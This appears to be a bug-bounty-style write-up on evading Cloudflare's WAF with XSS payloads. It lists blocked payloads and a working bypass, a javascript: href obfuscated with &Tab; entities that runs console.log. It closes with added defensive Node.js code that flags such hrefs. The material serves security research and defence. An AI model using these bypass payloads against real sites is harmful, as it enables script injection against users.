XSS Using console.log() to Bypass Cloudflare

Cross-Site Scripting (XSS) is an attack that allows attackers to inject malicious scripts into a web page, where they are executed by unsuspecting users' browsers. Proof of a successful injection usually relies on JavaScript functions like alert(), prompt(), and confirm(). However, security services like Cloudflare's web application firewall often block requests that contain these function calls. In this article, we explore alternative ways to demonstrate a successful XSS injection when Cloudflare blocks the usual functions.

Overcoming Cloudflare Protection

We attempted XSS attacks using basic payloads such as:
a. <script>alert()</script>
b. <svg onload=alert()>
c. <body onload=alert()>
d. <img src=x onerror=alert()>
e. <a href=javascript:alert()>XSS</a>

However, all of these payloads were blocked by Cloudflare and didn't provide evidence of a successful attack.

Using Anchor Tags with HTML Entities in the JavaScript Protocol

Next, we tried anchor tags whose javascript: protocol was obfuscated with HTML entities (an &Tab; between each letter). This was also blocked by Cloudflare.

Payload:
<a href="j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t:alert()">XSS</a>

Related Article:
Reflected XSS Bypass Payloads with HTML Entities: Kaskus Bug Bounty

Checking What Cloudflare Blocks

To confirm what Cloudflare was actually blocking, we removed the `alert()` call from the payload and observed the response. The request went through, which showed that the `alert()` call was what triggered the block, not the javascript: protocol itself.

Payload:
<a href="j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t:">XSS</a>

Response:
<a href="j a v a s c r i p t:>XSS</a>

Replacing alert() with prompt() and confirm()

We attempted to replace `alert()` with `prompt()` and `confirm()`, but the results remained the same; Cloudflare successfully blocked them.

Using document.write() as an Alternative

Next, we tried using `document.write()`, but Cloudflare still blocked this function.

Payload:
<a href="j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t:document.write()">XSS</a>

Final Payload: Using console.log()

As a final attempt, we used `console.log()` as the payload.

Payload:
<a href="j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t:console.log(1337)">XSS</a>

This payload successfully bypassed Cloudflare's protection: the browser console showed that `console.log(1337)` was executed.

Conclusion

While alert(), prompt(), and confirm() are commonly used as proof of a successful XSS attack, the attack itself doesn't depend on these functions. Cloudflare's protection blocks these specific calls, but with some exploration we were able to demonstrate the injection using `console.log()` instead. Understanding how a protection like Cloudflare works helps attackers search for and try alternative methods to get past it. Encoded characters and unusual character combinations are useful techniques for avoiding a block and demonstrating a successful XSS attack efficiently.
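The observations above show two things a defender should take from this write-up: the filter keyed on function names rather than on the javascript: scheme, and the &Tab; entities survived because the browser decodes them and the URL parser then strips ASCII tabs and newlines before reading the scheme. As an added example that is not part of the original article, the following Node.js code implements the check this suggests: decode the attribute value the way a browser would, normalize the scheme as the URL Standard does, and flag any href that resolves to javascript:, whatever call follows the colon. The entity table, the `findJavascriptHrefs` helper and the sample fragment are constructed for this example.

```javascript
// Added example, not code from the original article: a defender-side check that
// decides whether an href value resolves to the javascript: scheme after the
// decoding a browser applies, so detection does not hinge on which function
// name (alert, prompt, console.log, ...) appears in the payload.

// Named character references that commonly appear inside attribute values.
// Constructed subset; a production decoder needs the full HTML entity table.
const NAMED_ENTITIES = {
  Tab: "\t", NewLine: "\n", lt: "<", gt: ">", amp: "&", quot: '"', apos: "'",
};

// Decode named references (semicolon required) and decimal/hex numeric
// references (semicolon optional, as browsers accept in attribute values).
function decodeEntities(value) {
  return value.replace(
    /&(#[xX][0-9a-fA-F]+;?|#[0-9]+;?|[A-Za-z]+;)/g,
    (match, body) => {
      const ref = body.endsWith(";") ? body.slice(0, -1) : body;
      if (ref[0] === "#") {
        const hex = ref[1] === "x" || ref[1] === "X";
        const cp = parseInt(ref.slice(hex ? 2 : 1), hex ? 16 : 10);
        return cp > 0x10ffff ? match : String.fromCodePoint(cp);
      }
      return Object.prototype.hasOwnProperty.call(NAMED_ENTITIES, ref)
        ? NAMED_ENTITIES[ref]
        : match;
    }
  );
}

// URL Standard pre-processing: strip leading/trailing C0 controls and space,
// then remove every ASCII tab or newline anywhere in the input. This is why
// "j&Tab;a&Tab;v..." still navigates as javascript: while "j a v a ..." with
// real spaces does not.
function normalizedScheme(url) {
  const s = url
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
    .replace(/[\t\n\r]/g, "");
  const m = /^([A-Za-z][A-Za-z0-9+.\-]*):/.exec(s);
  return m ? m[1].toLowerCase() : null;
}

// True when the raw attribute text, as a browser would interpret it, is a
// javascript: URL. No function-name list involved.
function isJavascriptHref(rawAttributeValue) {
  return normalizedScheme(decodeEntities(rawAttributeValue)) === "javascript";
}

// Pull every href value out of an HTML fragment and return the ones that would
// navigate to javascript:. Regex extraction keeps the example short; a real
// filter should walk a parsed DOM instead.
function findJavascriptHrefs(html) {
  const found = [];
  const attr = /href\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  let m;
  while ((m = attr.exec(html)) !== null) {
    const value = m[1] ?? m[2] ?? m[3];
    if (isJavascriptHref(value)) found.push(value);
  }
  return found;
}

// Constructed sample: the article's final payload next to ordinary links.
const SAMPLE_FRAGMENT = [
  '<a href="https://example.com/docs">docs</a>',
  '<a href="j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t:console.log(1337)">XSS</a>',
  "<a href='&#106;avascript:void(0)'>numeric</a>",
  '<a href="/search?q=javascript:">relative</a>',
].join("\n");

console.log(findJavascriptHrefs(SAMPLE_FRAGMENT));
```

Running the file with `node` lists the two flagged hrefs (the &Tab; payload and the numeric-entity one) and ignores the ordinary links. This check belongs on the server side or in the sanitizer, next to contextual output encoding of any user data placed into href attributes; a Content-Security-Policy whose script-src omits 'unsafe-inline' additionally prevents javascript: navigations from executing even when a payload slips past the filter.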